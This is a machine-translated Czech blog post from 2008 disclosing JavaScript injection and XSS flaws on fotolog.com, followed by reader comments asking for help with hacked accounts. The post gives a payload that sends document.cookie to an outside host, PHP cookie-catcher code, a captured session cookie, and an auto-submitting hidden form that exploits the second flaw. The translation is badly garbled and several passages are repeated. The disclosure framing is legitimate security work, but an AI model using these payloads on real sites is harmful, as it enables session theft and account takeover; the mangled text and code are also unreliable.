Selhání FOTOLOG.COM
Publikováno na | 18. června 2008 | 16 Komentáře
Selhání FOTOLOG.COM
- Představení
- Vysvětlení neúspěchu
- Provozní poruchy
- Rozloučení
1. Úvod: Dobrý den!
S radostí, mé jméno je známo, Emilia jsem on-line pod přezdívkou "Knet" A já jsem webový vývojář zaměřený na bezpečnost počítačových systémů prostřednictvím tohoto dokumentu jsem se jim vysvětlit a následně zveřejnit několik chyb na webových stránkách www . fotolog.com.
Říkám jim, že důvody, které mě vedly k nalezení těchto chyb byla jen zvědavost a uplatňování znalostí o místě, jsem se vysvětlit, že v žádném okamžiku myslel zisku z těchto poruch, ani za účelem osobního zisku nebo tak něco.
Pokud je repo operace na opravu, jinak nebudu odpovídat, pokud tyto závady jsou nalezeny výtržníků.
Samozřejmě, říkám: Děkuji za vaši pozornost, a já nemám jiný problém.
Moje kontaktní mail je: Keynet.Security @ Gmail.com [email] [MSN]
Bydlím v: BS.AS / Argentina
Samozřejmě, říkám: Děkuji za vaši pozornost, a já nemám jiný problém.
Moje kontaktní mail je: Keynet.Security @ Gmail.com [email] [MSN]
Bydlím v: BS.AS / Argentina
2. Vysvětlení selhání selhání k léčbě:
- Javascript injekce
- 2. typu XSS (Cross Site Scripting)
Bug # 1 - Javascript injekce:
Konkrétně se jedná o selhání spočívá ve filtru proměnných, v sekci Můj účet - profil
na infererior.
EJ 1: 
EJ 2: 
Jak je vidět na "2" v EJ URL části kódu JS můžeme přidat, a tak jako výsledek optener
provádění událost JS v prohlížeči:
EJ 3:
Upozornit na hodnotu cookies z relace:
Chyba # 2 - 2. XSS typ:
Tato druhá chyba je v souboru: http://photo.fotolog.com/email_to_friends~~V a je také problém filtrování proměnných.
EJ 1:
a jak poemos naleznete v tomto druhém případě
EJ 2:
HTML kód běh bylo dosaženo, a tím začíná řetězec: </ textarea> a selhání při Odeslat informace, hodnota textarea se vedení zaslané poštou, které nejsou filtrovány pak přechází, které uzavírá textarea a spustí kód, který následuje. . .
3. Využití hlavní fallosla jednodušší a riskantní způsob, jak zneužít tuto chybu je krádež zasedání, budu demonstrovat jednoduché kroky, jako je to možné.
Využití bug # 1 - JavaScript injection
EJ 1:
pokud budeme mít možnost vidět na tomto obrázku, jsme upravili zdrojový kód, zvýšení hodnoty vstupu s názvem: odkaz: 72316332: url
a přidejte injekci JS.
vysvětlíme si injekční JS:
EJ 2:
javascript: document.location = 'http://www.remoteexecution.org/style.php?c =' + document.cookie
Tato událost, která je to, že prohlížeč je přesměrován na stránky:
http://www.remoteexecution.org/~~V style.php souborem a tento soubor aplikace speciálně naprogramovaný pro zachycení cookie pomocí prohlížeče, vaše sódigo zdroj je podobná následující:
<? Php
$ Ip = getenv ("REMOTE_ADDR");
Cookie $ = $ _GET ['c'];
$ Cookie_file = 'cookies.txt';
if (isset ($ cookie) && $ cookie! = "" && file_exists ($ cookie_file))
{
$ Open_file = fopen ($ cookie_file, '');
fclose ($ open_file);
header ("Location: http://www.fotolog.com/ ');
}
>
že to, co budeme dělat, je zápis souboru cookie "souboru Cookies.txt", který může pak být používán uživateli se zlými úmysly. sdílení stejných hodnot a krádeže opteniendo zasedání:
http://www.remoteexecution.org/~~V style.php souborem a tento soubor aplikace speciálně naprogramovaný pro zachycení cookie pomocí prohlížeče, vaše sódigo zdroj je podobná následující:
<? Php
$ Ip = getenv ("REMOTE_ADDR");
Cookie $ = $ _GET ['c'];
$ Cookie_file = 'cookies.txt';
if (isset ($ cookie) && $ cookie! = "" && file_exists ($ cookie_file))
{
$ Open_file = fopen ($ cookie_file, '');
fclose ($ open_file);
header ("Location: http://www.fotolog.com/ ');
}
>
že to, co budeme dělat, je zápis souboru cookie "souboru Cookies.txt", který může pak být používán uživateli se zlými úmysly. sdílení stejných hodnot a krádeže opteniendo zasedání:
po kliknutí se uživatel dostane jako ataquente: souboru Cookies.txt
session cookie:
dešifrovat:
paintrules | 1 | 0 | 1 | 1213390635 | 1213390635 | 21906539 | 2936b9eb107213b2bd104758141ec0e4
vidět, krást zasedání bylo dosaženo.
Využití bug # 2 - XSS (Cross Site Scripting) za nepřímé, HTML kódu, je třeba připravit útočník speciálně upravená tak, aby klikli, nebo dokonce aby to auto poslat, způsobí, že výstup kódu
takto:
<script>
funkce send ()
{
document.formulario.submit ();
}
</ Script>
<body OnLoad="enviar()">
<form method="POST" action="http://photo.fotolog.com/email_to_friends" name="formulario">
<input type="hidden" name="u" value="cumbio">
<input type="hidden" name="photo" value="47041145">
<input type="hidden" name="uploaded" value="false">
<input type="hidden" name="from" value="keynet.security@gmail.com">
<Input type = "hidden" name = "k"
<input type="hidden" name="message" value="He vidět obraz na straně Fotolog">
</ Form>
</ Body>
pak výsledek spustí skript, dříve vysvětlil, co to dělá.
a všechny stránky navštěvují, je útočník, s tímto typem poruchy na místě FOTOLOG.COM
všechno je riziko.
Nemluvě o tom, že místo kradení setkání by mohlo být 20 e-mail Přidat se autoenvien neustále způsobuje problémy nejen v provozu Fotolog, ale také třetím stranám. . .
a všechny stránky navštěvují, je útočník, s tímto typem poruchy na místě FOTOLOG.COM
všechno je riziko.
Nemluvě o tom, že místo kradení setkání by mohlo být 20 e-mail Přidat se autoenvien neustále způsobuje problémy nejen v provozu Fotolog, ale také třetím stranám. . .
Doufám, že se vám to líbilo, chápou a vědí, jak hodnotí své vysvětlení.
Beru odpovědnost za zneužití, a dokument byl připraven pomoci komunitu FOTOLOG.COM.
reintero můj kontakt [email] nebo [MSN]: Keynet.Security @ Gmail.com
S pozdravem.
PS: Omlouvám se za pravopisné chyby 
Kategorie: Nezařazeno
Komentáře
16 Reakce na "selhání" FOTOLOG.COM
Dovolená jeden Namítat
Profil
 |
Odkazy
Stránky
Kategorie
Evidence
- 05. 2012
- 02. 2012
- 10. 2011
- 06. 2011
- 05. 2011
- 02. 2011
- 10. 2010
- 07. 2010
- 06. 2010
- 05. 2010
- 04. 2010
- 03. 2010
- 01. 2010
- 12. 2009
- 11. 2009
- 10. 2009
- 08. 2009
- 07. 2009
- 06. 2009
- 05. 2009
- 04. 2009
- 12. 2008
- 11. 2008
- 10. 2008
- 09. 2008
- 08. 2008
- 07. 2008
- 06. 2008
- 05. 2008
- 02. 2008
- 11. 2007
- 10. 2007
- 09. 2007
- 08. 2007
- 07. 2007
- 06. 2007
- 05. 2007
- 04. 2007
- 03. 2007
- 02. 2007
- 01. 2007
- 09. 2006
- 08. 2006
- 07. 2006
- 06. 2006
- 05. 2006
- 04. 2006
- 03. 2006
- 02. 2006
- 01. 2006
- 12. 2005
- 10. 2005
- 09. 2005
- 08. 2005
- 07. 2005
- 06. 2005
- 05. 2005
Poslední příspěvky
Tagy
3-D 3D 3D Sýry Doritos 3D stereoskopické brýle MIX stereoskopické anaglyf anaglyphic Červená Modrá Zelená anaglyph stereoskopických anaglyphic Anaglyphic reklamní TV komerčních TV Dorito Hands nohy Doritos Cruncheando proma Dorito Doritos Doritos Otevřená ústa stereoskopického stereoskopického filtr brýle brýle skla oken hack hack Hammond Joaquin Sabina čočky ruce slída Mix Oči Oscar Rovira stránky Feet červené Sabritas stereoskopického Televize Tipy TV Zelená
Můj twitter
- PRI v nebezpečí Mexiko http://t.co/73UINqHI~~pobj 8 hod
- AMLO setkání se studenty v Tlatelolco Č. EstudiantesConAMLO http://t.co/xs6kXdig~~pobj přes @ youtube 9 hod
- # EstudiantesConAMLO Speech @ taibo2 : http://t.co/i2DBIOpR přes @ youtube 9 hod
- Josefina Branky: "Je to útok na manipulaci s fakty" - Aristegui Novinky http://t.co/Hce7AsJT přes @ aristeguionline před 1 dnem
- @ Mexteban ... jak to je, je toto poškození kvůli médiím znakem @ ESH před 1 dnem
- Další aktualizace ...
Vysílání pípání ...
Běží na Twitter Tools
Nedávné komentáře
sladké v Co se stalo v ATENCO? - sladké v Co se stalo v ATENCO?
-
Oscar Rovira Internet Radio Projekt -
JOEL Gutierrez RODRIGUEZ na Co se stalo v ATENCO? -
Vinueza cristhian Guzmán v Internet Radio Projektu
Vítejte
Posílám pozdrav
s vlajkou své země
Překladatel
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  |  |  |  |  |  |  |
 |  | ||||||
Kalendář
| L | M | X | J | V | S | D |
|---|---|---|---|---|---|---|
| "Kéž | Července " | |||||
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 | ||||||
Odkazy
Cíl
Můj Flickr obrázky
|
29 červenec 2008 @ 03:17
Woow, že dobrý, jak jsi dobrý lol
I já jsem velký zájem o bezpečnost a najít chyby v místech, lol
05.08.2008 @ 22:43
moje dcera hacknutý na fotoblog a je velmi trsite.yo nerozumí s počítačem. pomozte mi ji vrátí.
fotolog.com / onlytachh
díky
05.08.2008 @ 23:01
Dobrý den, můj problém je, nemůžu se přihlásit chtěli zjistit, jestli byste mohli opravit .. díky .. doufám, že si respuestaah! moje okno je 98
13 srpen 2008 @ 15:37
přidat k em hubená porq jste nepochopil jednu šuká haha
21 srpen 2008 @ 11:37
ahoj nemůžu začít hledat secion se stránky Fotolog
Chci jít a já jsem navrhl stránku q není schopen prokázat,
podle mě fabor vyřešit religiozita je agradesco
09.09.2008 @ 22:55
Fotolog Esq můj problém je nepřijmout nebo zadat zahájení sekcí comensar žádá data, ale ne aceprtar
porfa pomozte mi
24 září 2008 @ 15:19
Jsem hacknut na fotoblog
rekuperar potřebují kontraseña
Prosím ayudaamee
10.10.2008 @ 16:53
ahoj jsem tady jsem zavřela q
Fotolog účet a chci říci, zda byste mi prosím
Nemůžu se vrátit, prosím.
Dám vám dobře a doufám, že mnoho pozdravů
Odpověď od Vás
16 listopad 2008 @ 09:39
Jak mohu přizpůsobit fotoblog není uvěřit nedávno a chcete přizpůsobit díky
16 listopad 2008 @ 24:23
Já si nevzpomínám názvem zapsaným estou, díky
23 prosinec 2008 @ 05:59
ami jsem byl hacknut a já zavřel fotoblog / flasheadiitoh, které jsem zaplatil zlaté členství.
prosím, pomozte mi otevřít bičovat byl / flasheadiitoh
prosím přidejte mi a tak jsem si povídala obrátí 18,952: S soi.flasheadiitoh @ hotmail.com
29 prosinec 2008 @ 20:41
můžete začnu fotoblog je
/ Ziiikaaa
v mém Fotolog neměl zlato nebo něco, ale za rok to trvá Lásko, prosím activamelo
21 leden 2009 @ 02:33
Zavřel jsem tuto Fotolog
otevřené nebo hackeas?
28 únor 2009 @ 17:18
WUA děvka ke přihlásit ADM Kada mi volá, když jsem se pozastavit kodigos postiar muxo mohu opravit
03.03.2009 @ 12:05 AM
holiss am slídy jsou všichni géniové s fotografiemi miluji
14 duben 2009 @ 21:25
mléka přidáte do MSN, XQ nerozuměl moc ... a mám problém s Fotolog moc děkuji, doufám, že mě přijmou, tak jsem pdoe shacer UNF Avo .. dát si mě a moc děkuji ... velmi dobrý závod, vaše.
Já queir seeguir je parecidoo počítačový inženýr?
fabrizio.ge hodin .... je
Přijmout mě ..